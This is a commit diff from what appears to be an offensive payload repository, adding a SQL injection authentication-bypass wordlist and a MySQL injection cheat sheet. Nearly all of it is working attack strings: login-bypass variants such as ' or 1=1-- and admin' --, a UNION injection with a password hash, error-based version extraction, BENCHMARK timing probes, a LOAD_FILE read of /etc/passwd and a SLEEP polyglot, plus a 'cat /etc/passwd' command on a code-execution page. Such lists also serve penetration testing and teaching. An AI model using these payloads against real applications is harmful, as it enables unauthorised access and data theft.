MySQL Payloads
parent
f452acf0c2
commit
c874dad3e9
|
@ -2,7 +2,7 @@
|
|||
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
|
||||
|
||||
|
||||
## Vuln
|
||||
## Exploits
|
||||
Normal code execution
|
||||
```
|
||||
cat /etc/passwd
|
||||
|
|
|
@ -0,0 +1,77 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
@ -1,12 +1,58 @@
|
|||
# Title
|
||||
Lorem
|
||||
# SQL injection
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## Vuln
|
||||
## Exploit
|
||||
|
||||
Detection of an SQL injection entry point
|
||||
```
|
||||
Code
|
||||
'
|
||||
"
|
||||
%27
|
||||
" / %22
|
||||
; / %3B
|
||||
%%2727
|
||||
%25%27
|
||||
`+HERP
|
||||
'||'DERP
|
||||
'+'herp
|
||||
' ' DERP
|
||||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||||
transformed into U+0022 QUOTATION MARK (")
|
||||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||||
transformed into U+0027 APOSTROPHE (')
|
||||
```
|
||||
|
||||
|
||||
Authentication bypass - use the file "Authentication Bypass.txt"
|
||||
```
|
||||
SELECT id FROM users WHERE username='input1' AND password='input2'
|
||||
SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
||||
```
|
||||
|
||||
|
||||
MySQL Error Based
|
||||
```
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||
```
|
||||
|
||||
|
||||
MySQL Blind SQL
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
```
|
||||
|
||||
|
||||
MySQL Read content of a file
|
||||
```
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
|
||||
Polyglot injection (multicontext)
|
||||
```
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
|
Loading…
Reference in New Issue